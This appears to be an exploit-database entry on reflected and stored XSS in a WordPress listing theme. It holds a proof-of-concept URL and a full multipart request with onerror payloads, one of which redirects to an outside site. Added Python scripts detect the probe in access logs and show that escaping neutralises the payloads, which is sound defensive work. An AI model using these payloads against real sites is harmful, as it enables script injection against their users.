## https://sploitus.com/exploit?id=WPEX-ID:10309
### PoC Unauthenticated Reflected XSS:

```
https://demoapus.com/findgo/listings/?search_distance=%22%3E%3Cimg%20src=x%20onerror=alert(`XSS`)%3E
```
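The reflected case above is visible in ordinary web server access logs, because the payload travels in the query string of a GET. The following detection script is an added example (not part of the original advisory or the theme's code): it parses combined-format log lines, percent-decodes every query parameter (repeatedly, to catch double encoding) and flags any value that contains a tag with an `on*` event-handler attribute or an inline script. The log lines are constructed sample data; the second one carries the PoC URL exactly as a browser would send it. The stored variant in the next section is not caught this way, since its payload is in a POST body that access logs do not record.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Constructed combined-format access-log lines (sample data, not real traffic).
# Line 2 carries the reflected-XSS probe from the PoC URL as a browser would send it.
SAMPLE_LOG = """\
203.0.113.10 - - [12/May/2018:10:01:02 +0000] "GET /findgo/listings/?search_distance=25 HTTP/1.1" 200 5120
203.0.113.11 - - [12/May/2018:10:01:05 +0000] "GET /findgo/listings/?search_distance=%22%3E%3Cimg%20src=x%20onerror=alert(`XSS`)%3E HTTP/1.1" 200 5301
203.0.113.12 - - [12/May/2018:10:01:09 +0000] "POST /findgo/submit-listings/ HTTP/1.1" 302 0
"""

# client, timestamp, method, request target and status from a combined-format line
LOG_LINE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# A tag carrying an on* event-handler attribute, or an inline <script>, after decoding.
MARKUP_WITH_HANDLER = re.compile(r"<\s*\w+[^>]*\bon\w+\s*=|<\s*script\b", re.IGNORECASE)


def decode_fully(value, rounds=3):
    """Percent-decode repeatedly so double-encoded probes are seen in their final form."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def scan_log(text):
    """Return one finding per query parameter whose decoded value contains scriptable markup."""
    findings = []
    for line in text.splitlines():
        m = LOG_LINE.match(line)
        if not m:
            continue
        parts = urlsplit(m["target"])
        # parse_qsl already percent-decodes once; decode_fully handles extra layers
        for name, raw in parse_qsl(parts.query, keep_blank_values=True):
            value = decode_fully(raw)
            if MARKUP_WITH_HANDLER.search(value):
                findings.append({
                    "client": m["client"],
                    "time": m["ts"],
                    "path": parts.path,
                    "param": name,
                    "value": value,
                    "status": int(m["status"]),
                })
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['time']} {f['client']} {f['path']} "
              f"param={f['param']!r} status={f['status']} value={f['value']!r}")
```

The response status is kept in each finding because it helps triage: a 200 for a request like the second line means the page rendered, so the parameter was probably reflected; repeated hits from one client against the same parameter are worth correlating with later listing submissions.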

### PoC Authenticated Persistent XSS:

```http
POST /findgo/submit-listings/ HTTP/1.1
Host: demoapus.com
Content-Type: multipart/form-data; boundary=---------------------------9002581211289785581847109542
Content-Length: 5963
Origin: https://demoapus.com
Referer: https://demoapus.com/findgo/submit-listings/
Cookie: wp-job-manager-submitting-job-id=3564; chosen_package_id=55; chosen_package_is_user_package=1; apus_preset=1525856081; hidde_popup_newsletter=1;[ other_cookies_here ]

-----------------------------9002581211289785581847109542
Content-Disposition: form-data; name="job_layout_type"

global
-----------------------------9002581211289785581847109542
Content-Disposition: form-data; name="job_title"

PoC
-----------------------------9002581211289785581847109542
Content-Disposition: form-data; name="company_tagline"

poc
-----------------------------9002581211289785581847109542
Content-Disposition: form-data; name="job_category[]"

53
-----------------------------9002581211289785581847109542
Content-Disposition: form-data; name="job_regions"

-1
-----------------------------9002581211289785581847109542
Content-Disposition: form-data; name="company_price_range"

notsay
-----------------------------9002581211289785581847109542
Content-Disposition: form-data; name="company_price_from"


-----------------------------9002581211289785581847109542
Content-Disposition: form-data; name="company_price_to"


-----------------------------9002581211289785581847109542
Content-Disposition: form-data; name="job_description"

PoC
-----------------------------9002581211289785581847109542
Content-Disposition: form-data; name="job_hours[1][start]"


-----------------------------9002581211289785581847109542
Content-Disposition: form-data; name="job_hours[1][end]"


-----------------------------9002581211289785581847109542
Content-Disposition: form-data; name="job_hours[2][start]"


-----------------------------9002581211289785581847109542
Content-Disposition: form-data; name="job_hours[2][end]"


-----------------------------9002581211289785581847109542
Content-Disposition: form-data; name="job_hours[3][start]"


-----------------------------9002581211289785581847109542
Content-Disposition: form-data; name="job_hours[3][end]"


-----------------------------9002581211289785581847109542
Content-Disposition: form-data; name="job_hours[4][start]"


-----------------------------9002581211289785581847109542
Content-Disposition: form-data; name="job_hours[4][end]"


-----------------------------9002581211289785581847109542
Content-Disposition: form-data; name="job_hours[5][start]"


-----------------------------9002581211289785581847109542
Content-Disposition: form-data; name="job_hours[5][end]"


-----------------------------9002581211289785581847109542
Content-Disposition: form-data; name="job_hours[6][start]"


-----------------------------9002581211289785581847109542
Content-Disposition: form-data; name="job_hours[6][end]"


-----------------------------9002581211289785581847109542
Content-Disposition: form-data; name="job_hours[0][start]"


-----------------------------9002581211289785581847109542
Content-Disposition: form-data; name="job_hours[0][end]"


-----------------------------9002581211289785581847109542
Content-Disposition: form-data; name="job_location"


-----------------------------9002581211289785581847109542
Content-Disposition: form-data; name="geo_latitude"


-----------------------------9002581211289785581847109542
Content-Disposition: form-data; name="geo_longitude"


-----------------------------9002581211289785581847109542
Content-Disposition: form-data; name="company_website"


-----------------------------9002581211289785581847109542
Content-Disposition: form-data; name="company_phone"


-----------------------------9002581211289785581847109542
Content-Disposition: form-data; name="company_email"


-----------------------------9002581211289785581847109542
Content-Disposition: form-data; name="_job_menu_prices[0][section_title]"

"><img src=x onerror=alert(document.domain);window.location=`https://twitter.com/vlad_vector`;>
-----------------------------9002581211289785581847109542
Content-Disposition: form-data; name="_job_menu_prices[0][title][]"

"><img src=x onerror=alert(`XSS1`)>
-----------------------------9002581211289785581847109542
Content-Disposition: form-data; name="_job_menu_prices[0][price][]"

"><img src=x onerror=alert(`XSS2`)>
-----------------------------9002581211289785581847109542
Content-Disposition: form-data; name="_job_menu_prices[0][description][]"

</textarea>"><img src=x onerror=alert(`XSS3`)>
-----------------------------9002581211289785581847109542
Content-Disposition: form-data; name="company_logo"; filename=""
Content-Type: application/octet-stream


-----------------------------9002581211289785581847109542
Content-Disposition: form-data; name="gallery_images[]"; filename=""
Content-Type: application/octet-stream


-----------------------------9002581211289785581847109542
Content-Disposition: form-data; name="company_video"

"><img src=x onerror=alert(`XSS`)>
-----------------------------9002581211289785581847109542
Content-Disposition: form-data; name="company_twitter"


-----------------------------9002581211289785581847109542
Content-Disposition: form-data; name="company_facebook"


-----------------------------9002581211289785581847109542
Content-Disposition: form-data; name="company_linkedin"


-----------------------------9002581211289785581847109542
Content-Disposition: form-data; name="company_instagram"


-----------------------------9002581211289785581847109542
Content-Disposition: form-data; name="job_tags"


-----------------------------9002581211289785581847109542
Content-Disposition: form-data; name="job_manager_form"

submit-job
-----------------------------9002581211289785581847109542
Content-Disposition: form-data; name="job_id"

0
-----------------------------9002581211289785581847109542
Content-Disposition: form-data; name="step"

1
-----------------------------9002581211289785581847109542
Content-Disposition: form-data; name="submit_job"

Save & Preview
-----------------------------9002581211289785581847109542--
```
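The persistent case works because the submitted `_job_menu_prices[...]` and `company_video` values are stored and later written back into the listing form and the public listing page without escaping for the context they land in: the `">` prefix closes an attribute value, and the `</textarea>` prefix on the description closes a textarea before the tag follows. The example below is added here and is not the theme's code or the advisory's; it takes the four payload values from the request above, renders them into a constructed edit form with and without context-aware escaping, and uses Python's HTML parser to check whether the rendered markup contains any element with an event handler. It also shows an input-side tag stripper as defense in depth. In a WordPress theme the equivalent calls are `esc_attr()` for attribute values, `esc_textarea()` for textarea bodies, `esc_html()` for element text and `sanitize_text_field()` on the way in.

```python
import html
import re
from html.parser import HTMLParser

# Field values taken from the multipart request above (the section_title one shortened
# to its alert); the surrounding form markup is constructed for this example.
SUBMITTED_FIELDS = {
    "_job_menu_prices[0][section_title]": '"><img src=x onerror=alert(document.domain)>',
    "_job_menu_prices[0][title][]": '"><img src=x onerror=alert(`XSS1`)>',
    "_job_menu_prices[0][description][]": '</textarea>"><img src=x onerror=alert(`XSS3`)>',
    "company_video": '"><img src=x onerror=alert(`XSS`)>',
}


def render_edit_form(fields, escaped):
    """Write the stored values back into three contexts: attribute value,
    textarea body and element body. With escaped=False this is the vulnerable
    string concatenation; with escaped=True every value is HTML-encoded
    (including quotes), which is enough for all three contexts."""
    enc = (lambda s: html.escape(s, quote=True)) if escaped else (lambda s: s)
    return (
        f'<input name="section_title" value="{enc(fields["_job_menu_prices[0][section_title]"])}">\n'
        f'<input name="title[]" value="{enc(fields["_job_menu_prices[0][title][]"])}">\n'
        f'<textarea name="description[]">{enc(fields["_job_menu_prices[0][description][]"])}</textarea>\n'
        f'<p class="video">{enc(fields["company_video"])}</p>\n'
    )


class EventHandlerFinder(HTMLParser):
    """Collect every element that carries an on* attribute in the parsed markup."""

    def __init__(self):
        super().__init__()
        self.hits = []

    def handle_starttag(self, tag, attrs):
        handlers = [name for name, _ in attrs if name.lower().startswith("on")]
        if handlers:
            self.hits.append((tag, handlers))


def find_event_handlers(markup):
    """Return [(tag, [handler attribute names]), ...] for the given HTML."""
    parser = EventHandlerFinder()
    parser.feed(markup)
    parser.close()
    return parser.hits


def sanitize_text(value):
    """Input-side defence in depth for plain-text fields (section titles, prices,
    video URLs): drop tags and control characters and collapse whitespace.
    Output escaping stays the primary control; this only limits what is stored."""
    no_tags = re.sub(r"<[^>]*>?", "", value)   # also removes a dangling '<'
    no_ctrl = "".join(ch for ch in no_tags if ch >= " " or ch == "\t")
    return " ".join(no_ctrl.split())


if __name__ == "__main__":
    for escaped in (False, True):
        hits = find_event_handlers(render_edit_form(SUBMITTED_FIELDS, escaped))
        print(f"escaped={escaped}: {len(hits)} element(s) with event handlers {hits}")
    print("sanitized title:", repr(sanitize_text(SUBMITTED_FIELDS["_job_menu_prices[0][title][]"])))
```

Running it shows four `img` elements with an `onerror` handler in the unescaped rendering and none in the escaped one; the textarea payload is neutralised by the same encoding because `&lt;/textarea&gt;` can no longer close the element. Note that tag stripping alone leaves `">` behind, which is harmless only because the output is still escaped; that is why the encoding step, not the stripper, is the fix.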